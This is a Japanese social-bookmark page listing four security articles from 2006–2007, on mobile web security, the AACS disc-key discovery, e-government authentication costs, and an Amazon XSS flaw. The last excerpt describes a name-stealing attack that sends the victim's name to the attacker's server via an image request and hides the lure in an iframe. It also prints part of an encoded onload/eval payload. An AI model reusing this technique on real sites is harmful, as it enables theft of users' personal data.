タグ

securityに関するpal-9999のブックマーク (4)

  • 高木浩光@自宅の日記 - 「ガラパゴス携帯のパラダイス鎖国」をWebの技術面から見る

    ■ 「ガラパゴス携帯のパラダイス鎖国」をWebの技術面から見る ワンクリック不当請求が問題となり携帯電話事業者各社が「お知らせ」を発表した2004年夏、8月29日の日記で総務省の「次世代移動体通信システム上のビジネスモデルに関する研究会」について少し触れた。実はもっと詳しく書くべき興味深い内容があったのだが、あまり言うのもいやらしい(せっかく解決に向けて動いて頂いているようなのに)という事情が当時はあったため、その後何もしていなかった。いまさらではあるが、これについて書き留めておく。 2000年に旧郵政省が「次世代移動体通信システム上のビジネスモデルに関する研究会」を開催していた*1。2001年に総務省情報通信政策局が報告書を公表している。 第1回 議事要旨, 郵政省, 2000年7月 第2回 議事要旨, 郵政省, 2000年9月 第3回 議事要旨, 郵政省, 2000年12月 第4回 議

    pal-9999
    pal-9999 2007/07/02
    さすがに詳しい!
  • HD DVDとBlu-rayの暗号化がついに完全突破されました - GIGAZINE

    Doom9というその筋の人々には有名な海外のフォーラム(いわゆる掲示板みたいなもの)にて、「arnezami」という名前のハッカーがHD DVDとBlu-rayに使われているAACS DRMの復号過程で使用されるキーを発見してしまいました。そのため、これまでは個別に復号化していた今までの過程が全部ぶっ飛ぶことになり、あっという間に暗号化の解除が可能になりました。 また、既にこの結果を受けて「BackupHDDVD」と「BackupBluray」がバージョンアップされたようです。詳細は以下の通り。 Processing Key, Media Key and Volume ID found!!! - Page 6 - Doom9's Forum ハックしたわけでもなく、クラックしたわけでもなく、リバースエンジニアリングでもなく、「arnezami」はHD DVDとBlu-rayがメモリに読み込

    HD DVDとBlu-rayの暗号化がついに完全突破されました - GIGAZINE
    pal-9999
    pal-9999 2007/02/14
    次世代ディスクはここからだ!
  • 「感情的」な電子政府 - 池田信夫 blog

    磯崎さんのブログに、「電子登録債権法制」がイケてないという話が出ている。これは先週、話題になった「パスポート申請1件に1600万円」というニュースと、根的な原因は同じである。要は、「公的個人認証」で要求されるセキュリティのレベルが異常に高いのだ。日の「電子政府」を、磯崎さんのように合理的に理解しようとすればするほど、わけがわからなくなる。逆に、それが非合理的な、あるいは感情的なシステムだと考えると、質が見えてくる。 最大の問題は、システムを設計する際の政府のリスク評価が歪んでいることである。たとえば、住基ネットに「侵入」されて住民基台帳の情報が流出するリスクと、それを守るために400億円以上かけてコンピュータ・ネットワークをつくり、その維持費に毎年200億円以上かかる費用対効果を客観的に評価する基準がないから、政府は「どんなにコストをかけてもいいからリスクをゼロにしろ」という要求

  • 本名吸い取り機 (AMAZON XSS) :: ぼくはまちちゃん!

    ↓これ 超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…! 名吸い取り機のできあがり! こわいね>< リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ! (ちょっとだけ解説) ↓urlデコードするとこう http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 9

    pal-9999
    pal-9999 2006/05/18
    これは洒落になってない
  • 1